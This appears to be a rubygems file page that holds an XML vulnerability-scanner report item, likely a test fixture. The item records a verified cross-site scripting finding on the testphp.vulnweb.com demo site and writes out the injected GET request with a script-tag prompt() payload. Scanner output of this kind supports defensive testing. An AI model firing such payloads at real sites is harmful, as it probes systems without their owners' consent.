Sha256: 44fb23e264aa99410373e1db1e2261d9b83345769cda9ef59d681f1b71496c1c
Contents?: true
Size: 1.31 KB
Versions: 15
Compression:
Stored size: 1.31 KB
Contents
<?xml version="1.0"?>
<ReportItem id="32" color="red">
<Name><![CDATA[Cross site scripting (verified)]]></Name>
<ModuleName><![CDATA[Scripting (XSS.script)]]></ModuleName>
<Details><![CDATA[URL encoded GET input <b><font color="dark">p</font></b> was set to <b><font color="dark">1'"()&%<ScRiPt >prompt(951846)</ScRiPt></font></b>]]></Details>
<Affects><![CDATA[/hpp/params.php]]></Affects>
<Parameter><![CDATA[p]]></Parameter>
<AOP_SourceFile><![CDATA[]]></AOP_SourceFile>
<AOP_SourceLine>0</AOP_SourceLine>
<AOP_Additional><![CDATA[]]></AOP_Additional>
<IsFalsePositive><![CDATA[False]]></IsFalsePositive>
<TechnicalDetails>
<Request><![CDATA[GET /hpp/params.php?p=1'%22()%26%25<ScRiPt%20>prompt(951846)</ScRiPt>&pp=1 HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
]]></Request>
<Response><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 07 Oct 2014 17:30:28 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Original-Content-Encoding: gzip
Content-Length: 40
]]></Response>
</TechnicalDetails>
</ReportItem>
Version data entries
15 entries across 15 versions & 1 rubygems